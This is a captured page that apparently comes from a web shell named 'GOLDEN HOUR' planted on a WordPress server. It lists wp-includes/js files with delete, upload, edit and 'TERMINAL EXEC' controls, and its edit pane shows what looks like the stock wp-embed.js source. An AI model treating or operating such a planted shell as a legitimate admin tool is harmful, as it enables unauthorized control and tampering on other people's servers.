GOLDEN HOUR
DIR: /home/vlabbdco/public_html/wp/wp-includes/js
UP
UPLOAD
Name
Size
Action
admin-bar.js
10.51 KB
DEL
admin-bar.min.js
3.45 KB
DEL
api-request.js
3.25 KB
DEL
api-request.min.js
1023 B
DEL
autosave.js
21.95 KB
DEL
autosave.min.js
5.67 KB
DEL
backbone.js
77.87 KB
DEL
backbone.min.js
23.57 KB
DEL
clipboard.js
26.18 KB
DEL
clipboard.min.js
8.8 KB
DEL
[ codemirror ]
-
DEL
colorpicker.js
28.4 KB
DEL
colorpicker.min.js
16.13 KB
DEL
comment-reply.js
12.17 KB
DEL
comment-reply.min.js
2.91 KB
DEL
[ crop ]
-
DEL
customize-base.js
25.22 KB
DEL
customize-base.min.js
7.67 KB
DEL
customize-loader.js
7.72 KB
DEL
customize-loader.min.js
3.47 KB
DEL
customize-models.js
6.66 KB
DEL
customize-models.min.js
3.59 KB
DEL
customize-preview-nav-menus.js
14.67 KB
DEL
customize-preview-nav-menus.min.js
4.92 KB
DEL
customize-preview-widgets.js
22.71 KB
DEL
customize-preview-widgets.min.js
7.64 KB
DEL
customize-preview.js
27.3 KB
DEL
customize-preview.min.js
10.45 KB
DEL
customize-selective-refresh.js
32.55 KB
DEL
customize-selective-refresh.min.js
10.44 KB
DEL
customize-views.js
4.95 KB
DEL
customize-views.min.js
2.39 KB
DEL
[ dist ]
-
DEL
heartbeat.js
23.39 KB
DEL
heartbeat.min.js
5.87 KB
DEL
hoverIntent.js
7.06 KB
DEL
hoverIntent.min.js
1.46 KB
DEL
hoverintent-js.min.js
1.68 KB
DEL
imagesloaded.min.js
5.39 KB
DEL
[ imgareaselect ]
-
DEL
[ jcrop ]
-
DEL
[ jquery ]
-
DEL
json2.js
17.99 KB
DEL
json2.min.js
3.07 KB
DEL
masonry.min.js
23.57 KB
DEL
mce-view.js
25.24 KB
DEL
mce-view.min.js
9.54 KB
DEL
media-audiovideo.js
24.45 KB
DEL
media-audiovideo.min.js
11.85 KB
DEL
media-editor.js
28.44 KB
DEL
media-editor.min.js
10.63 KB
DEL
media-grid.js
26.23 KB
DEL
media-grid.min.js
13.03 KB
DEL
media-models.js
42.77 KB
DEL
media-models.min.js
13.02 KB
DEL
media-views.js
265.05 KB
DEL
media-views.min.js
107.69 KB
DEL
[ mediaelement ]
-
DEL
[ plupload ]
-
DEL
quicktags.js
22.07 KB
DEL
quicktags.min.js
10.87 KB
DEL
shortcode.js
10.51 KB
DEL
shortcode.min.js
2.58 KB
DEL
swfobject.js
9.99 KB
DEL
[ swfupload ]
-
DEL
[ thickbox ]
-
DEL
[ tinymce ]
-
DEL
tw-sack.js
4.85 KB
DEL
tw-sack.min.js
3.21 KB
DEL
twemoji.js
32.31 KB
DEL
twemoji.min.js
15.38 KB
DEL
underscore.js
66.77 KB
DEL
underscore.min.js
18.39 KB
DEL
utils.js
4.56 KB
DEL
utils.min.js
1.82 KB
DEL
wp-ajax-response.js
3.68 KB
DEL
wp-ajax-response.min.js
2.38 KB
DEL
wp-api.js
45.88 KB
DEL
wp-api.min.js
14.34 KB
DEL
wp-auth-check.js
4.11 KB
DEL
wp-auth-check.min.js
1.62 KB
DEL
wp-backbone.js
14.88 KB
DEL
wp-backbone.min.js
2.97 KB
DEL
wp-custom-header.js
10.22 KB
DEL
wp-custom-header.min.js
4.34 KB
DEL
wp-embed-template.js
6.62 KB
DEL
wp-embed-template.min.js
3.1 KB
DEL
wp-embed.js
3.14 KB
DEL
wp-embed.min.js
1.22 KB
DEL
wp-emoji-loader.js
12.23 KB
DEL
wp-emoji-loader.min.js
2.92 KB
DEL
wp-emoji-release.min.js
18.25 KB
DEL
wp-emoji.js
8.76 KB
DEL
wp-emoji.min.js
2.82 KB
DEL
wp-list-revisions.js
970 B
DEL
wp-list-revisions.min.js
597 B
DEL
wp-lists.js
24.72 KB
DEL
wp-lists.min.js
7.34 KB
DEL
wp-pointer.js
9.99 KB
DEL
wp-pointer.min.js
3.54 KB
DEL
wp-sanitize.js
1.32 KB
DEL
wp-sanitize.min.js
458 B
DEL
wp-util.js
4.57 KB
DEL
wp-util.min.js
1.39 KB
DEL
wpdialog.js
569 B
DEL
wpdialog.min.js
281 B
DEL
wplink.js
20.66 KB
DEL
wplink.min.js
10.99 KB
DEL
zxcvbn-async.js
821 B
DEL
zxcvbn-async.min.js
351 B
DEL
zxcvbn.min.js
802.97 KB
DEL
Edit: wp-embed.js
/** * WordPress inline HTML embed * * @since 4.4.0 * @output wp-includes/js/wp-embed.js * * Single line comments should not be used since they will break * the script when inlined in get_post_embed_html(), specifically * when the comments are not stripped out due to SCRIPT_DEBUG * being turned on. */ (function ( window, document ) { 'use strict'; /* Abort for ancient browsers. */ if ( ! document.querySelector || ! window.addEventListener || typeof URL === 'undefined' ) { return; } /** @namespace wp */ window.wp = window.wp || {}; /* Abort if script was already executed. */ if ( !! window.wp.receiveEmbedMessage ) { return; } /** * Receive embed message. * * @param {MessageEvent} e */ window.wp.receiveEmbedMessage = function( e ) { var data = e.data; /* Verify shape of message. */ if ( ! ( data || data.secret || data.message || data.value ) || /[^a-zA-Z0-9]/.test( data.secret ) ) { return; } var iframes = document.querySelectorAll( 'iframe[data-secret="' + data.secret + '"]' ), blockquotes = document.querySelectorAll( 'blockquote[data-secret="' + data.secret + '"]' ), allowedProtocols = new RegExp( '^https?:$', 'i' ), i, source, height, sourceURL, targetURL; for ( i = 0; i < blockquotes.length; i++ ) { blockquotes[ i ].style.display = 'none'; } for ( i = 0; i < iframes.length; i++ ) { source = iframes[ i ]; if ( e.source !== source.contentWindow ) { continue; } source.removeAttribute( 'style' ); if ( 'height' === data.message ) { /* Resize the iframe on request. */ height = parseInt( data.value, 10 ); if ( height > 1000 ) { height = 1000; } else if ( ~~height < 200 ) { height = 200; } source.height = height; } else if ( 'link' === data.message ) { /* Link to a specific URL on request. */ sourceURL = new URL( source.getAttribute( 'src' ) ); targetURL = new URL( data.value ); if ( allowedProtocols.test( targetURL.protocol ) && targetURL.host === sourceURL.host && document.activeElement === source ) { window.top.location.href = data.value; } } } }; function onLoad() { var iframes = document.querySelectorAll( 'iframe.wp-embedded-content' ), i, source, secret; for ( i = 0; i < iframes.length; i++ ) { /** @var {IframeElement} */ source = iframes[ i ]; secret = source.getAttribute( 'data-secret' ); if ( ! secret ) { /* Add secret to iframe */ secret = Math.random().toString( 36 ).substring( 2, 12 ); source.src += '#?secret=' + secret; source.setAttribute( 'data-secret', secret ); } /* * Let post embed window know that the parent is ready for receiving the height message, in case the iframe * loaded before wp-embed.js was loaded. When the ready message is received by the post embed window, the * window will then (re-)send the height message right away. */ source.contentWindow.postMessage( { message: 'ready', secret: secret }, '*' ); } } window.addEventListener( 'message', window.wp.receiveEmbedMessage, false ); document.addEventListener( 'DOMContentLoaded', onLoad, false ); })( window, document );
SAVE FILE
TERMINAL
EXEC